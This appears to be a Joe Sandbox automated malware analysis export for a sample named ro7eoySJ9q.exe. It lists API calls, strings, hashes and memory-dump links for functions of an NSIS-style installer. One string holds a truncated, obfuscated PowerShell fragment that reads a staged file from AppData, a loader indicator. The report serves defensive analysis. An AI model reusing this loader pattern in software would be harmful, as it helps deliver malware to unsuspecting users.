SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052B9
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052D2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052DE
GetDlgItem.USER32(?,000003F8), ref: 004051B6

Part of subcall function 00403FCA: SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8

GetDlgItem.USER32(?,000003EC), ref: 004052FB
CreateThread.KERNELBASE(00000000,00000000,Function_000050CD,00000000), ref: 00405309
CloseHandle.KERNELBASE(00000000), ref: 00405310
ShowWindow.USER32(00000000), ref: 00405334
ShowWindow.USER32(?,00000008), ref: 00405339
ShowWindow.USER32(00000008), ref: 00405380
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B2
CreatePopupMenu.USER32 ref: 004053C3
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053D8
GetWindowRect.USER32(?,?), ref: 004053EB
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040540F
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040544A
OpenClipboard.USER32(00000000), ref: 0040545A
EmptyClipboard.USER32 ref: 00405460
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040546C
GlobalLock.KERNEL32(00000000), ref: 00405476
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040548A
GlobalUnlock.KERNEL32(00000000), ref: 004054AA
SetClipboardData.USER32(0000000D,00000000), ref: 004054B5
CloseClipboard.USER32 ref: 004054BB

Strings

{, xrefs: 0040539F

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
Instruction ID: 772e8fb2bc22c5523386e43e2fe12f7b772d85fac993704a731418f1505fe185
Opcode Fuzzy Hash: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
Instruction Fuzzy Hash: A8A14871800609FFDB119F60DD89AAE7B79FF08355F00403AFA45BA1A0CBB59A51DF58

Function 00405D68 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405E2B
GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EA9
GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EBC
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405EF8
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00405F06
CoTaskMemFree.OLE32(?), ref: 00405F11
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F35
lstrlenW.KERNEL32(: Completed,00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405F8F

Strings

"$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich, xrefs: 00405F62
: Completed, xrefs: 00405D92, 00405E72, 00405E93, 00405EA8, 00405EBB, 00405ED7, 00405F02, 00405F34, 00405F3A, 00405F54, 00405F68, 00405F88, 00405F8E, 00405F9A, 00405FCD
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E77
Frisurens, xrefs: 00405D8D
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405F2F

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich$: Completed$Frisurens$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-276129843
Opcode ID: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
Instruction ID: b81ff5d6b4e7f68ebbf9f5a60334f295c7cfdbca171d810927ba552bda20cf23
Opcode Fuzzy Hash: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
Instruction Fuzzy Hash: E761C071A00906ABDF209F25CD45AAF37A5EF55314F14803BE585BA2E0D77D8A82CF8D

Function 004055D5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 004055FE
lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 00405646
lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 00405669
lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 0040566F
FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 0040567F
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,?,?,0000003F), ref: 00405733
FindClose.KERNEL32(00000000), ref: 00405744

Strings

"C:\Users\user\Desktop\ro7eoySJ9q.exe", xrefs: 004055DE
\*.*, xrefs: 00405640
C:\Users\user\AppData\Local\Temp\, xrefs: 004055E3

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3969872327
Opcode ID: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
Instruction ID: 4fa580f458b6ccb0767a7c3d42ea348ba32fb6fd56c90456328cf5468defc57c
Opcode Fuzzy Hash: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
Instruction Fuzzy Hash: 8A51B135800A05EACB21AB218C85ABF7778EF81754F54843BF415B61D1E77C4982EE6D

Function 004060B0 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
GetProcAddress.KERNEL32(00000000,?), ref: 004060DE

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
Instruction ID: 8a2f4544d0f7460eb2636e635d5deeba11c8ac6a6071c480d08d1599e38ef1a2
Opcode Fuzzy Hash: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
Instruction Fuzzy Hash: C3E0CD326002309BC3204B30AE4497773EC9F98640305043EF645F6000CB74DC22EF69

Function 00406089 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00430248,0042FA00,004058FF,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,76233420,004055F5,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 00406094
FindClose.KERNELBASE(00000000), ref: 004060A0

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
Instruction ID: 8c9aebf9a212da5294cb1f82767a4f5960c49382cb163a998aea3b369420c93e
Opcode Fuzzy Hash: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
Instruction Fuzzy Hash: B2D012716585209BC7905738AE0C84B7A98AF593717224B36F46BF22E0CB3C8C66869C

Function 0040371A Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE

lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76233420,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 0040379B
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040381B
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040382E
GetFileAttributesW.KERNEL32(: Completed), ref: 00403839
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken), ref: 00403882

Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A

RegisterClassW.USER32(00433E40), ref: 004038BF
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038D7
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040390C
ShowWindow.USER32(00000005,00000000), ref: 00403942
LoadLibraryW.KERNELBASE(RichEd20), ref: 00403953
LoadLibraryW.KERNEL32(RichEd32), ref: 0040395E
GetClassInfoW.USER32(00000000,RichEdit20A,00433E40), ref: 0040396E
GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 0040397B
RegisterClassW.USER32(00433E40), ref: 00403984
DialogBoxParamW.USER32(?,00000000,00403ABD,00000000), ref: 004039A3

Strings

1033, xrefs: 0040373A, 00403796
C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 004037AA, 004037B2, 00403855, 0040385B, 0040386B
.exe, xrefs: 00403828
RichEdit, xrefs: 00403975
_Nb, xrefs: 0040389E, 00403906
RichEd20, xrefs: 0040394E
"C:\Users\user\Desktop\ro7eoySJ9q.exe", xrefs: 0040371D
Control Panel\Desktop\ResourceLocale, xrefs: 0040374E
: Completed, xrefs: 004037E2, 004037EB, 004037F9, 00403848, 0040384E
RichEdit20A, xrefs: 00403966, 0040396C
.DEFAULT\Control Panel\International, xrefs: 00403786
RichEd32, xrefs: 00403959
C:\Users\user\AppData\Local\Temp\, xrefs: 00403726
@>C, xrefs: 00403891

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 914957316-1308633169
Opcode ID: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
Instruction ID: f2efbd8b4e2183f22d1c30e2af872408ecd3ec1be094dd46b245239935a3b56e
Opcode Fuzzy Hash: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
Instruction Fuzzy Hash: 9B61D771100700AED320BF669D46F2B3AACEB85B46F10403FF941B62E2DBB95941CB2D

Function 00403ABD Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AF9
ShowWindow.USER32(?), ref: 00403B16
DestroyWindow.USER32 ref: 00403B2A
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B46
GetDlgItem.USER32(?,?), ref: 00403B67
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403B7B
IsWindowEnabled.USER32(00000000), ref: 00403B82
GetDlgItem.USER32(?,00000001), ref: 00403C30
GetDlgItem.USER32(?,00000002), ref: 00403C3A
SetClassLongW.USER32(?,000000F2,?), ref: 00403C54
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CA5
GetDlgItem.USER32(?,00000003), ref: 00403D4B
ShowWindow.USER32(00000000,?), ref: 00403D6C
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D7E
EnableWindow.USER32(?,?), ref: 00403D99
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DAF
EnableMenuItem.USER32(00000000), ref: 00403DB6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DCE
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403DE1
lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,00433EA0), ref: 00403E0A
SetWindowTextW.USER32(?,0042D1F8), ref: 00403E1E
ShowWindow.USER32(?,0000000A), ref: 00403F52

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
Instruction ID: 9063085a3fd87244c99a969d1f6d2bb761e88773988a4a67d8464f71257f90be
Opcode Fuzzy Hash: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
Instruction Fuzzy Hash: 7BC1CD71900305BFDB216F65EE8AE2A3E7CFB4970AB14043EF641B11E1CB7999429B1D

Function 00402CFF Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402D10
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ro7eoySJ9q.exe,00000400,?,?,?,00000000,004033FE,?), ref: 00402D2C

Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ro7eoySJ9q.exe,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00402D78

Strings

C:\Users\user\Desktop\ro7eoySJ9q.exe, xrefs: 00402D16, 00402D25, 00402D39, 00402D59
"C:\Users\user\Desktop\ro7eoySJ9q.exe", xrefs: 00402D05
C:\Users\user\Desktop, xrefs: 00402D5A, 00402D5F, 00402D65
Error launching installer, xrefs: 00402D4F
soft, xrefs: 00402DED
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402ED7
Null, xrefs: 00402DF6
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D09
Inst, xrefs: 00402DE4

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

